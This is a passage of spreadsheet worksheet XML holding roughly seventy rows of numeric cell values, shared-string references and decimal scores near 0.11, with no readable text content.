      <c r="C14935" s="2" t="s">
        <v>14398</v>
      </c>
      <c r="D14935" s="2">
        <v>1.0</v>
      </c>
      <c r="E14935" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14935" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="14936" ht="15.75" customHeight="1">
      <c r="A14936" s="1">
        <v>33022.0</v>
      </c>
      <c r="B14936" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C14936" s="2" t="s">
        <v>14399</v>
      </c>
      <c r="D14936" s="2">
        <v>1.0</v>
      </c>
      <c r="E14936" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14936" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="14937" ht="15.75" customHeight="1">
      <c r="A14937" s="1">
        <v>6307.0</v>
      </c>
      <c r="B14937" s="2">
        <v>4.8241428E7</v>
      </c>
      <c r="C14937" s="2" t="s">
        <v>14400</v>
      </c>
      <c r="D14937" s="2">
        <v>1.0</v>
      </c>
      <c r="E14937" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14937" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14938" ht="15.75" customHeight="1">
      <c r="A14938" s="1">
        <v>7543.0</v>
      </c>
      <c r="B14938" s="2">
        <v>5.1480486E7</v>
      </c>
      <c r="C14938" s="2" t="s">
        <v>14401</v>
      </c>
      <c r="D14938" s="2">
        <v>1.0</v>
      </c>
      <c r="E14938" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14938" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14939" ht="15.75" customHeight="1">
      <c r="A14939" s="1">
        <v>8084.0</v>
      </c>
      <c r="B14939" s="2">
        <v>5.3036331E7</v>
      </c>
      <c r="C14939" s="2" t="s">
        <v>14402</v>
      </c>
      <c r="D14939" s="2">
        <v>1.0</v>
      </c>
      <c r="E14939" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14939" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14940" ht="15.75" customHeight="1">
      <c r="A14940" s="1">
        <v>12123.0</v>
      </c>
      <c r="B14940" s="2">
        <v>2.6910064E7</v>
      </c>
      <c r="C14940" s="2" t="s">
        <v>14403</v>
      </c>
      <c r="D14940" s="2">
        <v>1.0</v>
      </c>
      <c r="E14940" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14940" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14941" ht="15.75" customHeight="1">
      <c r="A14941" s="1">
        <v>21432.0</v>
      </c>
      <c r="B14941" s="2">
        <v>2.216726E7</v>
      </c>
      <c r="C14941" s="2" t="s">
        <v>14404</v>
      </c>
      <c r="D14941" s="2">
        <v>1.0</v>
      </c>
      <c r="E14941" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14941" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14942" ht="15.75" customHeight="1">
      <c r="A14942" s="1">
        <v>26145.0</v>
      </c>
      <c r="B14942" s="2">
        <v>1.6039151E7</v>
      </c>
      <c r="C14942" s="2" t="s">
        <v>14405</v>
      </c>
      <c r="D14942" s="2">
        <v>1.0</v>
      </c>
      <c r="E14942" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14942" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="14943" ht="15.75" customHeight="1">
      <c r="A14943" s="1">
        <v>7166.0</v>
      </c>
      <c r="B14943" s="2">
        <v>5.0497195E7</v>
      </c>
      <c r="C14943" s="2" t="s">
        <v>14406</v>
      </c>
      <c r="D14943" s="2">
        <v>1.0</v>
      </c>
      <c r="E14943" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14943" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="14944" ht="15.75" customHeight="1">
      <c r="A14944" s="1">
        <v>18263.0</v>
      </c>
      <c r="B14944" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C14944" s="2" t="s">
        <v>14407</v>
      </c>
      <c r="D14944" s="2">
        <v>1.0</v>
      </c>
      <c r="E14944" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14944" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="14945" ht="15.75" customHeight="1">
      <c r="A14945" s="1">
        <v>25959.0</v>
      </c>
      <c r="B14945" s="2">
        <v>1.5266842E7</v>
      </c>
      <c r="C14945" s="2" t="s">
        <v>14408</v>
      </c>
      <c r="D14945" s="2">
        <v>1.0</v>
      </c>
      <c r="E14945" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14945" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="14946" ht="15.75" customHeight="1">
      <c r="A14946" s="1">
        <v>30354.0</v>
      </c>
      <c r="B14946" s="2">
        <v>3.8249531E7</v>
      </c>
      <c r="C14946" s="2" t="s">
        <v>14409</v>
      </c>
      <c r="D14946" s="2">
        <v>1.0</v>
      </c>
      <c r="E14946" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14946" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="14947" ht="15.75" customHeight="1">
      <c r="A14947" s="1">
        <v>30593.0</v>
      </c>
      <c r="B14947" s="2">
        <v>4.1206685E7</v>
      </c>
      <c r="C14947" s="2" t="s">
        <v>14410</v>
      </c>
      <c r="D14947" s="2">
        <v>1.0</v>
      </c>
      <c r="E14947" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14947" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="14948" ht="15.75" customHeight="1">
      <c r="A14948" s="1">
        <v>650.0</v>
      </c>
      <c r="B14948" s="2">
        <v>1.9916921E7</v>
      </c>
      <c r="C14948" s="2" t="s">
        <v>14411</v>
      </c>
      <c r="D14948" s="2">
        <v>1.0</v>
      </c>
      <c r="E14948" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14948" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="14949" ht="15.75" customHeight="1">
      <c r="A14949" s="1">
        <v>30633.0</v>
      </c>
      <c r="B14949" s="2">
        <v>4.1454802E7</v>
      </c>
      <c r="C14949" s="2" t="s">
        <v>14412</v>
      </c>
      <c r="D14949" s="2">
        <v>1.0</v>
      </c>
      <c r="E14949" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14949" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="14950" ht="15.75" customHeight="1">
      <c r="A14950" s="1">
        <v>14103.0</v>
      </c>
      <c r="B14950" s="2">
        <v>3.7750307E7</v>
      </c>
      <c r="C14950" s="2" t="s">
        <v>14413</v>
      </c>
      <c r="D14950" s="2">
        <v>1.0</v>
      </c>
      <c r="E14950" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14950" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14951" ht="15.75" customHeight="1">
      <c r="A14951" s="1">
        <v>16551.0</v>
      </c>
      <c r="B14951" s="2">
        <v>4.6812547E7</v>
      </c>
      <c r="C14951" s="2" t="s">
        <v>14414</v>
      </c>
      <c r="D14951" s="2">
        <v>1.0</v>
      </c>
      <c r="E14951" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14951" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14952" ht="15.75" customHeight="1">
      <c r="A14952" s="1">
        <v>19474.0</v>
      </c>
      <c r="B14952" s="2">
        <v>5.5830625E7</v>
      </c>
      <c r="C14952" s="2" t="s">
        <v>14415</v>
      </c>
      <c r="D14952" s="2">
        <v>1.0</v>
      </c>
      <c r="E14952" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14952" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14953" ht="15.75" customHeight="1">
      <c r="A14953" s="1">
        <v>21844.0</v>
      </c>
      <c r="B14953" s="2">
        <v>2.7143114E7</v>
      </c>
      <c r="C14953" s="2" t="s">
        <v>14416</v>
      </c>
      <c r="D14953" s="2">
        <v>1.0</v>
      </c>
      <c r="E14953" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14953" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14954" ht="15.75" customHeight="1">
      <c r="A14954" s="1">
        <v>24468.0</v>
      </c>
      <c r="B14954" s="2">
        <v>1.0976338E7</v>
      </c>
      <c r="C14954" s="2" t="s">
        <v>14417</v>
      </c>
      <c r="D14954" s="2">
        <v>1.0</v>
      </c>
      <c r="E14954" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14954" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14955" ht="15.75" customHeight="1">
      <c r="A14955" s="1">
        <v>32607.0</v>
      </c>
      <c r="B14955" s="2">
        <v>5825374.0</v>
      </c>
      <c r="C14955" s="2" t="s">
        <v>14418</v>
      </c>
      <c r="D14955" s="2">
        <v>1.0</v>
      </c>
      <c r="E14955" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14955" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="14956" ht="15.75" customHeight="1">
      <c r="A14956" s="1">
        <v>1702.0</v>
      </c>
      <c r="B14956" s="2">
        <v>2.854304E7</v>
      </c>
      <c r="C14956" s="2" t="s">
        <v>14419</v>
      </c>
      <c r="D14956" s="2">
        <v>1.0</v>
      </c>
      <c r="E14956" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14956" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="14957" ht="15.75" customHeight="1">
      <c r="A14957" s="1">
        <v>12429.0</v>
      </c>
      <c r="B14957" s="2">
        <v>2.9191463E7</v>
      </c>
      <c r="C14957" s="2" t="s">
        <v>14420</v>
      </c>
      <c r="D14957" s="2">
        <v>1.0</v>
      </c>
      <c r="E14957" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14957" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="14958" ht="15.75" customHeight="1">
      <c r="A14958" s="1">
        <v>16790.0</v>
      </c>
      <c r="B14958" s="2">
        <v>4.7750743E7</v>
      </c>
      <c r="C14958" s="2" t="s">
        <v>14421</v>
      </c>
      <c r="D14958" s="2">
        <v>1.0</v>
      </c>
      <c r="E14958" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14958" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="14959" ht="15.75" customHeight="1">
      <c r="A14959" s="1">
        <v>32763.0</v>
      </c>
      <c r="B14959" s="2">
        <v>6069505.0</v>
      </c>
      <c r="C14959" s="2" t="s">
        <v>14422</v>
      </c>
      <c r="D14959" s="2">
        <v>1.0</v>
      </c>
      <c r="E14959" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14959" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="14960" ht="15.75" customHeight="1">
      <c r="A14960" s="1">
        <v>6052.0</v>
      </c>
      <c r="B14960" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C14960" s="2" t="s">
        <v>14423</v>
      </c>
      <c r="D14960" s="2">
        <v>1.0</v>
      </c>
      <c r="E14960" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14960" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="14961" ht="15.75" customHeight="1">
      <c r="A14961" s="1">
        <v>963.0</v>
      </c>
      <c r="B14961" s="2">
        <v>2.2711723E7</v>
      </c>
      <c r="C14961" s="2" t="s">
        <v>14424</v>
      </c>
      <c r="D14961" s="2">
        <v>1.0</v>
      </c>
      <c r="E14961" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14961" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="14962" ht="15.75" customHeight="1">
      <c r="A14962" s="1">
        <v>12827.0</v>
      </c>
      <c r="B14962" s="2">
        <v>3.1633197E7</v>
      </c>
      <c r="C14962" s="2" t="s">
        <v>14425</v>
      </c>
      <c r="D14962" s="2">
        <v>1.0</v>
      </c>
      <c r="E14962" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14962" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="14963" ht="15.75" customHeight="1">
      <c r="A14963" s="1">
        <v>21935.0</v>
      </c>
      <c r="B14963" s="2">
        <v>2.8661381E7</v>
      </c>
      <c r="C14963" s="2" t="s">
        <v>14426</v>
      </c>
      <c r="D14963" s="2">
        <v>1.0</v>
      </c>
      <c r="E14963" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14963" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="14964" ht="15.75" customHeight="1">
      <c r="A14964" s="1">
        <v>4467.0</v>
      </c>
      <c r="B14964" s="2">
        <v>4.2462632E7</v>
      </c>
      <c r="C14964" s="2" t="s">
        <v>14427</v>
      </c>
      <c r="D14964" s="2">
        <v>1.0</v>
      </c>
      <c r="E14964" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14964" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="14965" ht="15.75" customHeight="1">
      <c r="A14965" s="1">
        <v>12267.0</v>
      </c>
      <c r="B14965" s="2">
        <v>2.8081472E7</v>
      </c>
      <c r="C14965" s="2" t="s">
        <v>14428</v>
      </c>
      <c r="D14965" s="2">
        <v>1.0</v>
      </c>
      <c r="E14965" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14965" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="14966" ht="15.75" customHeight="1">
      <c r="A14966" s="1">
        <v>18772.0</v>
      </c>
      <c r="B14966" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C14966" s="2" t="s">
        <v>14429</v>
      </c>
      <c r="D14966" s="2">
        <v>1.0</v>
      </c>
      <c r="E14966" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14966" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="14967" ht="15.75" customHeight="1">
      <c r="A14967" s="1">
        <v>18852.0</v>
      </c>
      <c r="B14967" s="2">
        <v>5.3981727E7</v>
      </c>
      <c r="C14967" s="2" t="s">
        <v>14430</v>
      </c>
      <c r="D14967" s="2">
        <v>1.0</v>
      </c>
      <c r="E14967" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14967" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="14968" ht="15.75" customHeight="1">
      <c r="A14968" s="1">
        <v>4386.0</v>
      </c>
      <c r="B14968" s="2">
        <v>4.2195535E7</v>
      </c>
      <c r="C14968" s="2" t="s">
        <v>14431</v>
      </c>
      <c r="D14968" s="2">
        <v>1.0</v>
      </c>
      <c r="E14968" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14968" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="14969" ht="15.75" customHeight="1">
      <c r="A14969" s="1">
        <v>4830.0</v>
      </c>
      <c r="B14969" s="2">
        <v>4.3658493E7</v>
      </c>
      <c r="C14969" s="2" t="s">
        <v>14432</v>
      </c>
      <c r="D14969" s="2">
        <v>1.0</v>
      </c>
      <c r="E14969" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14969" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="14970" ht="15.75" customHeight="1">
      <c r="A14970" s="1">
        <v>28211.0</v>
      </c>
      <c r="B14970" s="2">
        <v>2.5045699E7</v>
      </c>
      <c r="C14970" s="2" t="s">
        <v>14433</v>
      </c>
      <c r="D14970" s="2">
        <v>1.0</v>
      </c>
      <c r="E14970" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14970" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="14971" ht="15.75" customHeight="1">
      <c r="A14971" s="1">
        <v>33147.0</v>
      </c>
      <c r="B14971" s="2">
        <v>7066480.0</v>
      </c>
      <c r="C14971" s="2" t="s">
        <v>14434</v>
      </c>
      <c r="D14971" s="2">
        <v>1.0</v>
      </c>
      <c r="E14971" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14971" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="14972" ht="15.75" customHeight="1">
      <c r="A14972" s="1">
        <v>29227.0</v>
      </c>
      <c r="B14972" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C14972" s="2" t="s">
        <v>14435</v>
      </c>
      <c r="D14972" s="2">
        <v>1.0</v>
      </c>
      <c r="E14972" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14972" s="2">
        <v>0.1136363636363636</v>
      </c>
    </row>
    <row r="14973" ht="15.75" customHeight="1">
      <c r="A14973" s="1">
        <v>30897.0</v>
      </c>
      <c r="B14973" s="2">
        <v>4.664824E7</v>
      </c>
      <c r="C14973" s="2" t="s">
        <v>14436</v>
      </c>
      <c r="D14973" s="2">
        <v>1.0</v>
      </c>
      <c r="E14973" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14973" s="2">
        <v>0.113562091503268</v>
      </c>
    </row>
    <row r="14974" ht="15.75" customHeight="1">
      <c r="A14974" s="1">
        <v>26786.0</v>
      </c>
      <c r="B14974" s="2">
        <v>1.8562068E7</v>
      </c>
      <c r="C14974" s="2" t="s">
        <v>14437</v>
      </c>
      <c r="D14974" s="2">
        <v>1.0</v>
      </c>
      <c r="E14974" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14974" s="2">
        <v>0.1134920634920635</v>
      </c>
    </row>
    <row r="14975" ht="15.75" customHeight="1">
      <c r="A14975" s="1">
        <v>5980.0</v>
      </c>
      <c r="B14975" s="2">
        <v>4.7379205E7</v>
      </c>
      <c r="C14975" s="2" t="s">
        <v>14438</v>
      </c>
      <c r="D14975" s="2">
        <v>1.0</v>
      </c>
      <c r="E14975" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14975" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="14976" ht="15.75" customHeight="1">
      <c r="A14976" s="1">
        <v>15743.0</v>
      </c>
      <c r="B14976" s="2">
        <v>4.4116893E7</v>
      </c>
      <c r="C14976" s="2" t="s">
        <v>14439</v>
      </c>
      <c r="D14976" s="2">
        <v>1.0</v>
      </c>
      <c r="E14976" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14976" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="14977" ht="15.75" customHeight="1">
      <c r="A14977" s="1">
        <v>16116.0</v>
      </c>
      <c r="B14977" s="2">
        <v>4.541746E7</v>
      </c>
      <c r="C14977" s="2" t="s">
        <v>14440</v>
      </c>
      <c r="D14977" s="2">
        <v>1.0</v>
      </c>
      <c r="E14977" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14977" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="14978" ht="15.75" customHeight="1">
      <c r="A14978" s="1">
        <v>1318.0</v>
      </c>
      <c r="B14978" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C14978" s="2" t="s">
        <v>14441</v>
      </c>
      <c r="D14978" s="2">
        <v>1.0</v>
      </c>
      <c r="E14978" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14978" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14979" ht="15.75" customHeight="1">
      <c r="A14979" s="1">
        <v>3619.0</v>
      </c>
      <c r="B14979" s="2">
        <v>3.9189065E7</v>
      </c>
      <c r="C14979" s="2" t="s">
        <v>14442</v>
      </c>
      <c r="D14979" s="2">
        <v>1.0</v>
      </c>
      <c r="E14979" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14979" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14980" ht="15.75" customHeight="1">
      <c r="A14980" s="1">
        <v>6612.0</v>
      </c>
      <c r="B14980" s="2">
        <v>4.9026912E7</v>
      </c>
      <c r="C14980" s="2" t="s">
        <v>14443</v>
      </c>
      <c r="D14980" s="2">
        <v>1.0</v>
      </c>
      <c r="E14980" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14980" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14981" ht="15.75" customHeight="1">
      <c r="A14981" s="1">
        <v>6616.0</v>
      </c>
      <c r="B14981" s="2">
        <v>4.9026912E7</v>
      </c>
      <c r="C14981" s="2" t="s">
        <v>14444</v>
      </c>
      <c r="D14981" s="2">
        <v>1.0</v>
      </c>
      <c r="E14981" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14981" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14982" ht="15.75" customHeight="1">
      <c r="A14982" s="1">
        <v>8974.0</v>
      </c>
      <c r="B14982" s="2">
        <v>5.4954966E7</v>
      </c>
      <c r="C14982" s="2" t="s">
        <v>14445</v>
      </c>
      <c r="D14982" s="2">
        <v>1.0</v>
      </c>
      <c r="E14982" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14982" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14983" ht="15.75" customHeight="1">
      <c r="A14983" s="1">
        <v>9769.0</v>
      </c>
      <c r="B14983" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C14983" s="2" t="s">
        <v>14446</v>
      </c>
      <c r="D14983" s="2">
        <v>1.0</v>
      </c>
      <c r="E14983" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14983" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14984" ht="15.75" customHeight="1">
      <c r="A14984" s="1">
        <v>15725.0</v>
      </c>
      <c r="B14984" s="2">
        <v>4.4015816E7</v>
      </c>
      <c r="C14984" s="2" t="s">
        <v>14447</v>
      </c>
      <c r="D14984" s="2">
        <v>1.0</v>
      </c>
      <c r="E14984" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14984" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14985" ht="15.75" customHeight="1">
      <c r="A14985" s="1">
        <v>16894.0</v>
      </c>
      <c r="B14985" s="2">
        <v>4.8051071E7</v>
      </c>
      <c r="C14985" s="2" t="s">
        <v>14448</v>
      </c>
      <c r="D14985" s="2">
        <v>1.0</v>
      </c>
      <c r="E14985" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14985" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14986" ht="15.75" customHeight="1">
      <c r="A14986" s="1">
        <v>17485.0</v>
      </c>
      <c r="B14986" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C14986" s="2" t="s">
        <v>14449</v>
      </c>
      <c r="D14986" s="2">
        <v>1.0</v>
      </c>
      <c r="E14986" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14986" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14987" ht="15.75" customHeight="1">
      <c r="A14987" s="1">
        <v>18828.0</v>
      </c>
      <c r="B14987" s="2">
        <v>5.3937059E7</v>
      </c>
      <c r="C14987" s="2" t="s">
        <v>14450</v>
      </c>
      <c r="D14987" s="2">
        <v>1.0</v>
      </c>
      <c r="E14987" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14987" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14988" ht="15.75" customHeight="1">
      <c r="A14988" s="1">
        <v>22859.0</v>
      </c>
      <c r="B14988" s="2">
        <v>4.7200358E7</v>
      </c>
      <c r="C14988" s="2" t="s">
        <v>14451</v>
      </c>
      <c r="D14988" s="2">
        <v>1.0</v>
      </c>
      <c r="E14988" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14988" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14989" ht="15.75" customHeight="1">
      <c r="A14989" s="1">
        <v>25281.0</v>
      </c>
      <c r="B14989" s="2">
        <v>1.3396556E7</v>
      </c>
      <c r="C14989" s="2" t="s">
        <v>14452</v>
      </c>
      <c r="D14989" s="2">
        <v>1.0</v>
      </c>
      <c r="E14989" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14989" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14990" ht="15.75" customHeight="1">
      <c r="A14990" s="1">
        <v>31182.0</v>
      </c>
      <c r="B14990" s="2">
        <v>4913324.0</v>
      </c>
      <c r="C14990" s="2" t="s">
        <v>14453</v>
      </c>
      <c r="D14990" s="2">
        <v>1.0</v>
      </c>
      <c r="E14990" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14990" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14991" ht="15.75" customHeight="1">
      <c r="A14991" s="1">
        <v>32323.0</v>
      </c>
      <c r="B14991" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C14991" s="2" t="s">
        <v>14454</v>
      </c>
      <c r="D14991" s="2">
        <v>1.0</v>
      </c>
      <c r="E14991" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14991" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="14992" ht="15.75" customHeight="1">
      <c r="A14992" s="1">
        <v>254.0</v>
      </c>
      <c r="B14992" s="2">
        <v>1.5053358E7</v>
      </c>
      <c r="C14992" s="2" t="s">
        <v>14455</v>
      </c>
      <c r="D14992" s="2">
        <v>1.0</v>
      </c>
      <c r="E14992" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14992" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14993" ht="15.75" customHeight="1">
      <c r="A14993" s="1">
        <v>2035.0</v>
      </c>
      <c r="B14993" s="2">
        <v>3.0859633E7</v>
      </c>
      <c r="C14993" s="2" t="s">
        <v>14456</v>
      </c>
      <c r="D14993" s="2">
        <v>1.0</v>
      </c>
      <c r="E14993" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14993" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14994" ht="15.75" customHeight="1">
      <c r="A14994" s="1">
        <v>2184.0</v>
      </c>
      <c r="B14994" s="2">
        <v>3.1858563E7</v>
      </c>
      <c r="C14994" s="2" t="s">
        <v>14457</v>
      </c>
      <c r="D14994" s="2">
        <v>1.0</v>
      </c>
      <c r="E14994" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14994" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14995" ht="15.75" customHeight="1">
      <c r="A14995" s="1">
        <v>2761.0</v>
      </c>
      <c r="B14995" s="2">
        <v>3.5103425E7</v>
      </c>
      <c r="C14995" s="2" t="s">
        <v>14458</v>
      </c>
      <c r="D14995" s="2">
        <v>1.0</v>
      </c>
      <c r="E14995" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14995" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14996" ht="15.75" customHeight="1">
      <c r="A14996" s="1">
        <v>3290.0</v>
      </c>
      <c r="B14996" s="2">
        <v>3.7513189E7</v>
      </c>
      <c r="C14996" s="2" t="s">
        <v>14459</v>
      </c>
      <c r="D14996" s="2">
        <v>1.0</v>
      </c>
      <c r="E14996" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14996" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14997" ht="15.75" customHeight="1">
      <c r="A14997" s="1">
        <v>3496.0</v>
      </c>
      <c r="B14997" s="2">
        <v>3.8467156E7</v>
      </c>
      <c r="C14997" s="2" t="s">
        <v>14460</v>
      </c>
      <c r="D14997" s="2">
        <v>1.0</v>
      </c>
      <c r="E14997" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14997" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14998" ht="15.75" customHeight="1">
      <c r="A14998" s="1">
        <v>4491.0</v>
      </c>
      <c r="B14998" s="2">
        <v>4.2518731E7</v>
      </c>
      <c r="C14998" s="2" t="s">
        <v>14461</v>
      </c>
      <c r="D14998" s="2">
        <v>1.0</v>
      </c>
      <c r="E14998" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14998" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="14999" ht="15.75" customHeight="1">
      <c r="A14999" s="1">
        <v>7037.0</v>
      </c>
      <c r="B14999" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C14999" s="2" t="s">
        <v>14350</v>
      </c>
      <c r="D14999" s="2">
        <v>1.0</v>
      </c>
      <c r="E14999" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14999" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15000" ht="15.75" customHeight="1">
      <c r="A15000" s="1">
        <v>7279.0</v>
      </c>
      <c r="B15000" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C15000" s="2" t="s">
        <v>14462</v>
      </c>
      <c r="D15000" s="2">
        <v>1.0</v>
      </c>
      <c r="E15000" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15000" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15001" ht="15.75" customHeight="1">
      <c r="A15001" s="1">
        <v>10769.0</v>
      </c>
      <c r="B15001" s="2">
        <v>1.5604661E7</v>
      </c>
      <c r="C15001" s="2" t="s">
        <v>14463</v>
      </c>
      <c r="D15001" s="2">
        <v>1.0</v>
      </c>
      <c r="E15001" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15001" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15002" ht="15.75" customHeight="1">
      <c r="A15002" s="1">
        <v>10932.0</v>
      </c>
      <c r="B15002" s="2">
        <v>1.6929443E7</v>
      </c>
